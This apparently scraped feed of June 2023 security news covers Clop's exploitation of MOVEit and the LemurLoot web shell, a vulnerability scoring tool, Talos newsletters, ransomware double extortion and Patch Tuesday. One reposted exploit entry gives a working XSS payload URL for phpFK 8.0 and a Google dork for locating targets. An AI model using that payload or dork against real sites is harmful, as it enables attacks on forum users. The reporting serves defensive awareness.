The Clop ransomware group has claimed responsibility for exploiting the vulnerability to deploy a previously unseen web shell, LemurLoot.

Friday, June 16, 2023 14:06

*   Cisco Talos is monitoring recent reports of exploitation attempts against CVE-2023-34362, a SQL injection zero-day vulnerability in the MOVEit Transfer managed file transfer (MFT) solution that has been actively targeted since late May 2023.
*   Successful exploitation could lead to remote code execution (RCE), allowing unauthenticated adversaries to execute arbitrary code to support malicious activity, such as disabling anti-virus solutions (AV) or deploying malware payloads.
*   The Clop ransomware group has claimed responsibility for exploiting the vulnerability to deploy a previously unseen web shell, LemurLoot, to exfiltrate victims’ data and extort payments, and Microsoft has attributed these attacks to the same group, according to public reporting.
*   Two more vulnerabilities have since been found in MOVEit Transfer solutions, CVE-2023-35036 and CVE-2023-35708, although at this time, they are reportedly not being actively exploited.

**CVE-2023-34362 details and ongoing exploitation**

On May 31, the Progress Software Corporation released a security advisory warning customers of a vulnerability in internet-facing and on-premises instances of their MOVEit Transfer solution, which could lead to escalated privileges and potential unauthorized access to an environment. The vulnerability, CVE-2023-34362, has been actively exploited since May 27, but the threat actors may have begun experimenting to compromise it as early as 2021.

As of late May, there were approximately 2,500 exposed MOVEit instances primarily located in the U.S., according to public reporting, highlighting its prevalence in enterprise environments.

**Vulnerability details**

The MOVEit Transfer vulnerability, CVE-2023-34362, covers multiple flaws that an attacker can chain together to achieve RCE with elevated privileges. The first part of the exploit chain uses SQL injection to obtain a sysadmin API token. That token can then be used to call a deserialization function that does not properly validate input, allowing for remote code execution.

A second vulnerability, CVE-2023-35036, was assigned and Progress Software released patches and an advisory addressing this issue. Patches for CVE-2023-35036 are meant to mitigate multiple parts of the successful exploit chain initially discovered to have been used during the exploitation of the first vulnerability, CVE-2023-34362.

On June 15, 2023, another vulnerability was identified, CVE-2023-35708. Progress Software is in the process of releasing installable patches for this issue although DLL drop-ins.

**Ongoing exploitation**

The Clop ransomware group released a public statement on their Tor data leak site on June 5, claiming responsibility for the attacks and threatening to publish victims’ data if the extortion demand is not paid. The group provided a deadline of June 14 for victims to initiate contact or else their company name would be posted on the data leak site as a warning. At this time, no data has been published but they have begun publicly naming and shaming affected companies.

  
In this activity, the Clop ransomware group exploited CVE-2023-34362 to install a previously unknown web shell now dubbed “LemurLoot”.

Written in C#, LemurLoot is designed to exfiltrate data and execute on systems running MOVEit Transfer. The web shell is deployed with a hardcoded, 36-character GUID-formatted value used to authenticate incoming connection requests from the threat actor. The authentication code value must be present in the “X-siLock-Comment” header field without which an HTTP 404 error code will be returned to the operator. If the value is correct, the web shell confirms it can accept taskings and connects to an attacker-controlled SQL server.

LemurLoot uses the header field “X-siLock-Step1’ to receive the commands from the operator. There are two well-defined commands: -1 and -2. The fields “X-siLock-Step2’ and  “X-siLock-Step3” are used to hold parameters to be used when no command has been defined.

**_Command “-1”:_** _LemurLoot retrieves Azure system settings from MOVEit Transfer and performs SQL queries to retrieve files._

**_Command “-2”:_** _LemureLoot deletes a user account with the LoginName and RealName set to "Health Check Service"._

For any other values of “X-siLock-Step1,” the web shell will open a file specified by the folder and file name in “X-siLock-Step2”, and “X-siLock-Step3” respectively and retrieve it for the operator.

If no values of “X-siLock-Step2” and “X-siLock-Step3” are specified, then the web shell creates the “Health Check Service” admin user and creates an active session.

**Recommendations  
**

Progress Software Corporation offers several mitigations for safeguarding against potential exploitation of this vulnerability and best practices for network security:

*   Please refer to the advisories for CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708 to apply corresponding patches.
*   Modify firewall rules to deny HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443 until the patch can be applied.
*   Delete unauthorized files and user accounts and reset service account credentials.
*   Continuously monitor networks for early detection in the event of a compromise.
*   Update network firewall rules to only allow connections to the MOVEit Transfer infrastructure from known trusted IP addresses.
*   Update remote access policies to only allow inbound connections from known and trusted IP addresses, and use certificate-based access control.
*   Enable multi-factor authentication. Multi-factor authentication (MFA) protects MOVEit Transfer accounts from unverified users when a user's account password is lost, stolen, or compromised.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing the following Snort SIDs to protect against this threat:

*   61876 - 61879
*   61936
*   300582, 300583

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

*   Win.Ransomware.Clop-6881304-0
*   Win.Ransomware.Clop-6887770-0

**IOCs  
****Webshell (LemurLoot)**

702421bcee1785d93271d311f0203da34cc936317e299575b06503945a6ea1e0  
9d1723777de67bc7e11678db800d2a32de3bcd6c40a629cd165e3f7bbace8ead  
9e89d9f045664996067a05610ea2b0ad4f7f502f73d84321fb07861348fdc24a  
d49cf23d83b2743c573ba383bf6f3c28da41ac5f745cde41ef8cd1344528c195  
b1c299a9fe6076f370178de7b808f36135df16c4e438ef6453a39565ff2ec272  
6015fed13c5510bbb89b0a5302c8b95a5b811982ff6de9930725c4630ec4011d  
48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a  
2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5  
e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e

Active exploitation of the MOVEit Transfer vulnerability — CVE-2023-34362 — by Clop ransomware group

Coalition ESS uses AI to generate dynamic risk scores to help organizations mitigate their most critical risks faster.

**SAN FRANCISCO** **— June 15, 2023** **—** Coalition, the world's first Active Insurance provider designed to prevent digital risk before it strikes, today announced the Coalition Exploit Scoring System (Coalition ESS), a unique vulnerability scoring system that helps risk managers mitigate potential cyber threats. Developed by Coalition Security Labs, the company's research and innovation center, Coalition ESS is a security risk prioritization scoring system that leverages real-time monitoring and dynamic scoring to enable businesses of all sizes to efficiently understand which vulnerabilities to patch first. 

"In cybersecurity, timing is everything. Thousands of new vulnerabilities are published monthly, and it’s nearly impossible for IT and security teams to quickly understand and address them all. Defenders need a more efficient way to sift through the noise and prioritize which vulnerabilities to remediate," said Tiago Henriques, Coalition's Head of Security Research. "With Coalition ESS, they have an early source of truth to evaluate which risks to prioritize mitigating _before_ an incident occurs."

Coalition ESS leverages artificial intelligence and large language modeling to scan the descriptions used within newly released CVEs (Common Vulnerabilities and Exposures) and compares them to previously published vulnerabilities to predict the likelihood of exploitability. The result is two probability scores: the Exploit Availability Probability, or the likelihood that code for an exploit will be publicly available, and the Exploit Usage Probability, or the likelihood that threat actors will use an exploit to execute an attack. These scores combined give security managers and IT professionals a prioritization list outlining which vulnerabilities pose the greatest threat, saving time and resources in an otherwise arduous decision-making process. 

Coalition ESS scores are dynamic, responding to changes in available exploit information, unlike the scores derived from the Common Vulnerability Scoring System (CVSS). Coalition ESS scores are available up to one week from the initial vulnerability announcement, unlike other systems where scoring a vulnerability can take anywhere from one week up to one month.

"We created Coalition ESS to prioritize our own vulnerability management efforts as we are often the first line of defense for hundreds of thousands of assets of our customers at scale. We use ESS to evaluate and notify our policyholders about which vulnerabilities have the highest potential to negatively affect them and, today, are releasing it to the broader community," continued Henriques. 

Coalition ESS is available today for public use at: ess.coalitioninc.com. To learn more about Coalition’s cybersecurity research and innovation center, Security Labs, visit: www.coalitioninc.com/security-labs.

Coalition Releases Security Vulnerability Exploit Scoring System

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

The information leak threats are certainly new, but the education and messaging from security evangelists (and even just anyone trying to educate an older or less security-savvy family member) doesn’t change.

Thursday, June 15, 2023 14:06

Welcome to this week’s edition of the Threat Source newsletter.

Talos’ recent blog post on the dangers posed by the newly released “.zip” top-level domain (TLD) recently outlined how threat actors could create real URLs that look like file names and trick users into clicking on their links. .Zip and other TLDs that share characters with filename extensions also opens the door to accidental information leaks.

But these are far from the first TLDs to be problematic for users, especially those who are less educated about the verbiage that makes the internet work as intended.

The same day .zip was released as a TLD for anyone to register, the Internet Corporation for Assigned Names and Numbers (ICANN) also made .mov available as a TLD. The tricks here are obvious — think of someone who would see a file named “WeddingVideo.mov” and just assume it was from their legitimate family member.

(As a side note, I very much want to own jon.dad now, as .dad is also a TLD released in this batch.)

Attackers have long used tricky URLs to lure victims, though. We’ve written several times about how typo-squatted domains are used in cyber attacks. This is when an adversary takes a legitimate URL like twitter.com and uses a slightly modified version to make it just close enough that it looks like the real thing, like tvitter\[.\]com or twltter\[.\]com. And there are a variety of ways any slight DNS misconfiguration (which goes beyond just typing the URL into a browser window) could lead to information leaks or phishing lures.

The ever-present .com is also a common TLD that gets used to stand up legitimate-looking names for actors.

As security researcher and content creator Bobby Rauch pointed out in this recent post on Medium, attackers have used legitimate websites to mask malicious URLs to avoid detection and suspicion from the target.

For example, they can insert the “@” operator in a website URL to send someone to a different website, even though it may look legitimate.

The URL https://google\[.\]com@bing\[.\]com actually takes the user to bing.com even though it looks like it will send them to Google initially. Regardless of the TLD used there, an attacker could leverage it to trick someone who isn’t savvy enough to examine each detail of a URL.

There are other TLDs that could easily be used in convincing phishing emails or lure documents: .media is a long-available TLD that could easily be worked into a seemingly legitimate-looking file, and I’m assuming I wasn’t the only person to ever assume that the .run TLD could double as a file extension for a Mac driver.

There are certain dangers that .zip and .mov URLs pose to users, but we’ve always known that everyone needs to quadruple-check the URL they plan on visiting. The information leak threats are certainly new, but the education and messaging from security evangelists (and even just anyone trying to educate an older or less security-savvy family member) doesn’t change.

**The one big thing**

June’s Patch Tuesday is the first in a while in which Microsoft’s security updates didn’t include a warning against a zero-day vulnerability. Each of the previous four months included at least one issue that attackers were actively exploited in the wild. Still, Microsoft disclosed almost 70 vulnerabilities across its suite of software and hardware, including several that are “more likely” to be exploited. Cisco Talos specifically discovered two vulnerabilities in Microsoft Excel that the company patched Tuesday. These are important-severity remote code execution vulnerabilities that are triggered if the targeted user opens an attacker-created file.

**Why do I care?**

It’s certainly good news that there are no new zero-days included in this week’s Patch Tuesday — we’ve had enough of those already this year across all software manufacturers. But there are multiple vulnerabilities that are critical and have a very high severity score of 9.8 out of 10 that should be patched immediately.

**So now what?**

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. All Microsoft users should patch immediately or take appropriate mitigation steps as outlined in these advisories. Talos also released several Snort rules that can detect the exploitation of these vulnerabilities or block the attacker from taking malicious actions.

**Top security headlines of the week**

Progress Software released patches for several security vulnerabilities it discovered in its MOVEit file transfer software while researching a high-profile zero-day that has already led to multiple data breaches across the globe. The advisory for the new vulnerabilities states that they “could potentially be used by a bad actor to stage an exploit” but, currently, there is no evidence that they have been exploited in the wild. Security researchers have also published new proof of concept code to exploit CVE-2023-34362, the zero-day in MOVEit, which found that an attacker could exploit the issue to execute remote code on the targeted machine. It previously had only been identified as an SQL injection issue. Attackers have exploited CVE-2023-34362 to steal data from organizations using MOVEit, including the BBC, the Minnesota Department of Education and the Canadian province of Nova Scotia. (SecurityWeek, SC Media)

A group of high-profile American investors is reportedly considering purchasing assets belonging to NSO Group, the Israeli tech firm behind the infamous Pegasus spyware. The potential buyers include a financier who’s long been involved in Hollywood movies and a family member behind the Wrigley’s gum brand. Security experts and journalists have wondered about the financial status of NSO Group after it was added to the U.S. Department of Commerce’s list that bans the U.S. government and American companies from doing business with them. Meanwhile, the NSO Group has also reportedly been paying high-profile lobbying groups in D.C. to try and convince Congress to move the company from the banned list. The materials used by the lobbying groups reportedly state that the NSO Group’s software has a new “human rights governance compliance program.” (The Guardian, Haaretz)

America’s top cybersecurity official warned of the dangers of cyber attacks from Chinese state-sponsored actors, warning that critical infrastructure would become a key target in the event of a military conflict with China. Jen Easterly, speaking at an appearance at the Aspen Institute this week, said that China’s cyber espionage and offensive capabilities are an “epoch-defining threat.” Easterly, the director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), said Chinese threat actors were also likely to carry out cyber attacks against American infrastructure, like oil pipelines and electrical grids, should the two countries ever get into a kinetic military conflict. National security experts have long warned about a U.S.-China conflict if China ever invaded Taiwan. "Given the formidable nature of the threat from Chinese state actors, given the size of their capability, given how much resources and effort they're putting into it, it's going to be very, very difficult for us to prevent disruptions from happening," Easterly said. (CNBC, Reuters)

**Can’t get enough Talos?**

*   Talos Takes Ep. #142: Horabot is here to do "horable" things to your email inbox
*   The Need to Know: What does it mean when ransomware actors use “double extortion” tactics?
*   Vulnerability Spotlight: Two remote code execution vulnerabilities disclosed in Microsoft Excel
*   Threat Roundup for June 2 - 9
*   ThreatWise TV: Snort trends

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** a8a6d67140ac6cfec88b748b8057e958a825224fcc619ed95750acbd1d7a4848  
**MD5:** 8cb26e5b687cafb66e65e4fc71ec4d63  
**Typical Filename:** dattService.exe  
**Claimed Product:** Datto Service Monito  
**Detection Name:** W32.Auto:a8a6d6.in03.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b  
**MD5:** f5e908f1fac5f98ec63e3ec355ef6279  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::tpd

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

URLs have always been a great hiding place for threat actors

NetSecOpen recently released a new draft of its testing and benchmarking guide, which could be adopted later this year.

Despite slow progress, NetSecOpen — a group of network security companies and hardware testing organizations — aims to have its testing and benchmark standards in place by later this year.

The group published the latest version of its network security testing standard for next-generation firewall technology in May to gather feedback as the group moves toward a final version. The end result will be a consensus method for testing and benchmarking network security appliances that allows comparisons of different vendors' devices, even if they are evaluated by different third parties, says Brian Monkman, executive director of NetSecOpen.

"What we're working on accomplishing here is something that's never been done — setting up standard test requirements that can be executed by multiple labs using different test tools and getting comparable results," he says. "It's something analogous to when the miles per gallon ... had different approaches and ... they tested things differently and so they forced the creation of a standard. That's kind of what we're doing here."

Established in 2017, NetSecOpen aims to ease the tension between product makers and test labs, which have occasionally become rancorous. Members include large network security firms — including Cisco Systems, Fortinet, Palo Alto Networks, and WatchGuard — as well as testing equipment makers, such as Spirent and Ixia, and evaluators, such as the European Advanced Networking Test Center (EANTC) and the University of New Hampshire InterOperability Laboratory (UNH-IOL).

While the latest standards document is published as part of the Internet Engineering Task Force (IETF) process, the eventual guidelines will not be an Internet standard to which equipment makers must adhere, but a common approach to testing methodology and configurations that improve the reproducibility and transparency of resulting tests.

The current testing standards for firewalls published by the IETF (RFC3511) are 20 years old, and the technology has changed dramatically, NetSecOpen stated in its draft (RFC9411).

"Security function implementations have evolved and diversified into intrusion detection and prevention, threat management, analysis of encrypted traffic, and more," the draft states. "In an industry of growing importance, well-defined and reproducible key performance indicators (KPIs) are increasingly needed to enable fair and reasonable comparisons of network security functions."

**Real-World Test Cases**

The NetSecOpen tests aim to use real-world data to pit the latest network security appliances against realistic network loads and security threats. The attack traffic test set, for example, brings together common vulnerabilities that have been used by attackers in the past decade.

The NetSecOpen draft recommends specific test architectures, traffic mixes between IPv4 and IPv6, and enabled security features. However, other aspects of testing include required elements, such as the capabilities of emulated browsers, attack traffic that targets a specific subset of known exploitable vulnerabilities, and tests of a variety of throughput performances, such as application traffic, HTTPS requests, and quick UDP Internet connections (QUIC) protocol requests.

Network security firm Palo Alto Network, a founding member of NetSecOpen, actively collaborates with NetSecOpen to "create the tests and actively participate in testing our firewalls using those tests," says Samaresh Nair, director of product line management at Palo Alto Networks.

"The testing process is ... standardized with accredited test houses," he says. "Customers can use it to evaluate various products with standardized results tested similarly."

The vulnerabilities test sets are in the process of being updated because the Cybersecurity and Infrastructure Security Agency (CISA) demonstrated that smaller, noncritical vulnerabilities can be strung together into effective attacks. The organizations had previously dismissed many of those vulnerabilities as a lesser threat, but attack chain data CISA collected show that attackers will adapt.

"There's definitely a class of CVEs out there that we, in the past, would have ignored, and we need to pay attention to those simply because vulnerabilities are being strung together," NetSecOpen's Monkman says. "That's going to be really the biggest challenge that we have because the CISA KEV vulnerability list might grow."

**Cloud Up Next**

In addition to new mixes of vulnerabilities — such as those that are currently targeting the education and healthcare sectors — NetSecOpen is looking to include detection of command-and-control channels used by attackers, as well as ways of preventing infection and lateral movement.

Testing the security of cloud environments — such as distributed cloud firewalls and Web application firewalls — is also on the future blueprint, says Chris Brown, technical manager at UNH-IOL, which joined NetSecOpen in 2019.

"Cloud would not change NetSecOPEN’s mission for well-defined, open, and transparent standards, but rather expand the products currently tested," Brown says. "In the foreseeable future, network perimeter defense will still be necessary despite the many benefits of cloud computing."

Network-Security Testing Standard Nears Prime Time

RA Group also introduces a new wrinkle to double extortion attacks: the threat that it will sell the data on the dark web. Double extortion tactics are known for leaking stolen data, but the sale is a potentially new gambit.

Wednesday, June 14, 2023 08:06

It is no longer enough for ransomware actors to encrypt targets’ files, ask for money, and get out.

Over the past several years, these groups are increasingly relying on “double extortion” tactics to try and coax their victims into paying the requested ransom, or else they will leak stolen data to the internet.

In double extortion ransomware attacks, actors perform traditional ransomware actions of encrypting files and folders on a target’s machine. They leave behind a ransom note asking for a certain amount of money, in exchange for a decryption key that can return the target’s network and hardware back to normal working order.

Of course, there is never any guarantee that this decryption key will work appropriately, so Talos recommends several other ransomware mitigation methods to ensure backups are in place to help an organization recover quickly if they are hit with a ransomware attack.

Actors who use double extortion take this a step further, threatening to leak the target’s data to the public and on the dark web if the ransom is not paid. For some organizations, this puts troves of potentially sensitive data at risk of becoming public information, such as personally identifiable information (PII) or financial information that other bad actors may use in follow-on attacks or to steal someone’s identity.

**What is the end goal of double extortion attacks?**

Ransomware actors hope that by adding on the extra layer of pressure, it makes victims more likely to pay the requested ransom rather than trying to recover on their own.

Any data leaks could lead to legal troubles for the targeted organization, poor public relations and a loss of customer trust.

At the end of the day, ransomware groups are motivated by money. They will do whatever they can to make it more likely for the victim to pay up.

These groups are also increasingly embracing communication with victims to potentially negotiate payment and provide additional pressure on o the victim. Nick Biasini, the head of Talos Outreach, recently discussed these tactics in an episode of Talos Takes, where he summed up ransomware groups’ motivations by saying, “You can’t get a payday if you can’t start a conversation...once they have communication, they know they have a victim who’s potentially ready to play ball.”

**Notable example: RA Group**

RA Group, a new ransomware actor Cisco Talos recently discovered, explicitly uses double extortion tactics. It runs an actor-controlled website where it posts a list of possible victims and publicly threatens to publish the data it steals from targets.

RA Group claims to include the organization’s name, a list of stolen data and the file sizes of the data it stole and the URL of the website belonging to the victim organization. The ransom notes the actor leaves behind are customized for the victim and are told they have three days to pay the requested ransom or they risk all the stolen data being made public.

When the three-day mark is reached, RA Group says it will publish “sample files” to prove the legitimacy of its claims. The leak site states that “we will publish documents regularly and all documents will be released within one year.”

RA Group also introduces a new wrinkle to double extortion attacks: the threat that it will sell the data on the dark web. Double extortion tactics are known for leaking stolen data, but the sale is a potentially new gambit.

The group’s leak site is one of the first examples Talos has seen where it publicly threatens to sell the data to other bad actors during that one-year window. It explicitly tells anyone interested in purchasing the data to contact RA Group via qTox, an encrypted instant messaging platform.

This is potentially a new development in the ransomware landscape and a new way for threat actors to generate revenue from a successful attack.

Talos has researched several other threat actors who started using double extortion methods over the past three years, including UNC2447, Vice Society and Silence Group.

**Prevention**

To defend against double-extortion ransomware attacks, users and organizations should follow the classic advice for avoiding ransomware:

*   Using multi-factor authentication protocols such as Cisco Duo can prevent credential stealing, which often provides threat actors with an initial foothold on the targeted system.

*   Cisco Secure Endpoint and other Cisco Secure offerings provide many layers of protection to make any network more resilient. Cisco Secure and Talos have multiple engines, such as Snort, to detect and prevent initial infection, reconnaissance, lateral movement and file encryption.
*   Incident Response playbooks and plans can help all organizations prepare for a ransomware attack and outlines steps to take in the event of an attack. Cisco Talos Incident Response can assist in the creation and updating of these documents.
*   Perform frequent backups of all systems and important files, and verify those backups are stored in a secure, yet accessible, place. Targets of ransomware can restore operations quickly by restoring from a previous state using backups.
*   Provide cybersecurity training to all employees and users to ensure they’re aware of the dangers of various social engineering tactics and common attack vectors for threat actors.
*   For additional advice and information, refer to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Stop Ransomware website.

What does it mean when ransomware actors use “double extortion” tactics?

Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023.
Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderated, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser

Patch Tuesday / Vulnerability

Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of Patch Tuesday updates for June 2023.

Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderated, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser.

It's worth noting that Microsoft also closed out 26 other flaws in Edge – all of them rooted in Chromium itself – since the release of May Patch Tuesday updates. This comprises CVE-2023-3079, a zero-day bug that Google disclosed as being actively exploited in the wild last week.

The June 2023 updates also mark the first time in several months that doesn't feature any zero-day flaw in Microsoft products that's publicly known or under active attack at the time of release.

Topping the list of fixes is CVE-2023-29357 (CVSS score: 9.8), a privilege escalation flaw in SharePoint Server that could be exploited by an attacker to gain administrator privileges.

"An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user," Microsoft said. "The attacker needs no privileges nor does the user need to perform any action."

Also patched by Redmond are three critical remote code execution bugs (CVE-2023-29363, CVE-2023-32014, and CVE-2023-32015, CVSS scores: 9.8) in Windows Pragmatic General Multicast (PGM) that could be weaponized to "achieve remote code execution and attempt to trigger malicious code."

Microsoft previously addressed a similar flaw in the same component (CVE-2023-28250, CVSS score: 9.8), a protocol designed to deliver packets between multiple network members in a reliable manner, in April 2023.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

Also resolved by the tech giant are two remote code execution bugs impacting Exchange Server (CVE-2023-28310 and CVE-2023-32031) that could permit an authenticated attacker to achieve remote code execution on affected installations.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Android
*   Arm
*   Cisco
*   Citrix
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   Hitachi Energy
*   HP
*   IBM
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MOVEit Transfer
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   Qualcomm
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Splunk
*   Synology
*   Trend Micro
*   Veritas
*   VMware
*   WordPress
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Releases Updates to Patch Critical Flaws in Windows and Other Software

Categories: Exploits and vulnerabilities
Categories: News
Tags: Microsoft

Tags:  patch Tuesday

Tags:  CVE-2023-29357

Tags:  CVE-2023-29363

Tags:  CVE-2023-32014

Tags:  CVE-2023-32015

Tags:  CVE-2023-32013

Tags:  CVE-2023-24897

Tags:  CVE-2023-32031

Tags:  SharePoint

Tags:  PGM

Tags:  Exchange

Tags:  Hyper-V

Patch Tuesday of June 2023 is relatively relaxed. No actively exploited zero-days and only six critical vulnerabilities.



(Read more...)




The post Microsoft fixes six critical vulnerabilities in June Patch Tuesday appeared first on Malwarebytes Labs.

It’s that time of the month again: We're looking at June's Patch Tuesday roundup. Microsoft has released its monthly update, and compared to previous months, it’s actually not so bad. No actively exploited zero-days and only six critical vulnerabilities.

So, we’ll have the luxury of going over those in some more detail.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The critical CVEs patched in these updates are:

CVE-2023-29357 (CVSS score: 9.8 out of 10): a Microsoft SharePoint Server Elevation of Privilege  (EoP) vulnerability. Successful exploitation could provide an attacker with administrator privileges. For the exploitation, the attacker needs no privileges nor do they require user interaction.

The Microsoft advisory states:

> "An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user."

JWT is a token based stateless authentication mechanism. Basically, the identity provider generates a JWT that certifies the user identity and the resource server decodes and verifies the authenticity of the token by using secret salt or public key.

CVE-2023-29363 (CVSS score: 9.8 out of 10): a Windows Pragmatic General Multicast (PGM) Remote Code Execution (RCE) vulnerability.

PGM is a reliable and scalable multicast protocol that enables receivers to detect loss, request retransmission of lost data, or notify an application of unrecoverable loss. PGM is a receiver-reliable protocol, which means the receiver is responsible for ensuring all data is received, absolving the sender of reception responsibility. It is mainly used for delivering multicast data such as video streaming or online gaming.

CVE-2023-32014 (CVSS score: 9.8 out of 10): another PGM RCE vulnerability.

CVE-2023-32015 (CVSS score: 9.8 out of 10): another PGM RCE vulnerability.

For all the PGM vulnerabilities, Microsoft points out that: when Windows message queuing service is running in a PGM Server environment, an attacker could send a specially crafted file over the network to achieve remote code execution and attempt to trigger malicious code.

The Windows message queuing service, which is a Windows component, needs to be enabled for a system to be exploitable by this vulnerability. This feature can be added via the Control Panel. You can check to see if there is a service running named Message Queuing and TCP port 1801 is listening on the machine.

